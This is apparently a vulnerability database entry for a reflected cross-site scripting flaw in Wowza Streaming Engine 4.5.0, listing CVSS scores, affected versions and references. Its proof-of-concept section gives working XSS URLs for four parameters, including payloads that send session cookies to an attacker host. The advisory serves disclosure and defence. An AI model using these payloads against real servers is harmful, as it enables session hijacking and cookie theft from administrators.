Security Vulnerability Report
CVE-2016-20036 CVSS 6.1 MEDIUM

CVE-2016-20036

Published: 2026-03-16 14:17:51
Last Modified: 2026-03-19 14:17:48

Description

Wowza Streaming Engine 4.5.0 contains multiple reflected cross-site scripting vulnerabilities in the enginemanager interface where input passed through various parameters is not properly sanitized before being returned to users. Attackers can inject malicious script code through parameters like appName, vhost, uiAppType, and wowzaCloudDestinationType in multiple endpoints to execute arbitrary HTML and JavaScript in a user's browser session.

CVSS Details

CVSS Score (v3.1, Primary): 6.1
Severity: MEDIUM
CVSS Vector (v3.1): CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
Exploitability Score: 2.8
Impact Score: 2.7

CVSS Score (v4.0, Secondary): 5.1
Severity: MEDIUM
CVSS Vector (v4.0): CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X

Configurations (Affected Products)

cpe:2.3:a:wowza:streaming_engine:4.5.0:*:*:*:*:*:*:* - VULNERABLE
Wowza Streaming Engine 4.5.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```html
<!-- CVE-2016-20036 PoC - Reflected XSS in Wowza Streaming Engine -->
<!-- Target: Wowza Streaming Engine 4.5.0 enginemanager -->
<!-- Vulnerable Parameters: appName, vhost, uiAppType, wowzaCloudDestinationType -->

<!-- Basic XSS PoC -->
https://target:8080/enginemanager/server/serverhost.jsp?appName=<script>alert(document.cookie)</script>
https://target:8080/enginemanager/server/serverhost.jsp?vhost=<img src=x onerror=alert('XSS')>
https://target:8080/enginemanager/home/index.jsp?uiAppType=<script>alert(document.domain)</script>
https://target:8080/enginemanager/server/vhost.jsp?wowzaCloudDestinationType=<svg/onload=alert(document.cookie)>

<!-- Cookie Stealing PoC -->
https://target:8080/enginemanager/server/serverhost.jsp?appName=<script>fetch('https://attacker.com/steal?c='+document.cookie)</script>

<!-- Session Hijacking PoC -->
https://target:8080/enginemanager/home/index.jsp?uiAppType=<script>document.location='https://attacker.com/log?cookie='+document.cookie</script>
```

Weakness

CWE-79 (Cross-site Scripting)

References

http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5343.php (Exploit, Third Party Advisory)
https://www.exploit-db.com/exploits/40135 (Exploit, Third Party Advisory, VDB Entry)
https://www.vulncheck.com/advisories/wowza-streaming-engine-multiple-cross-site-scripting-vulnerabilities (Third Party Advisory)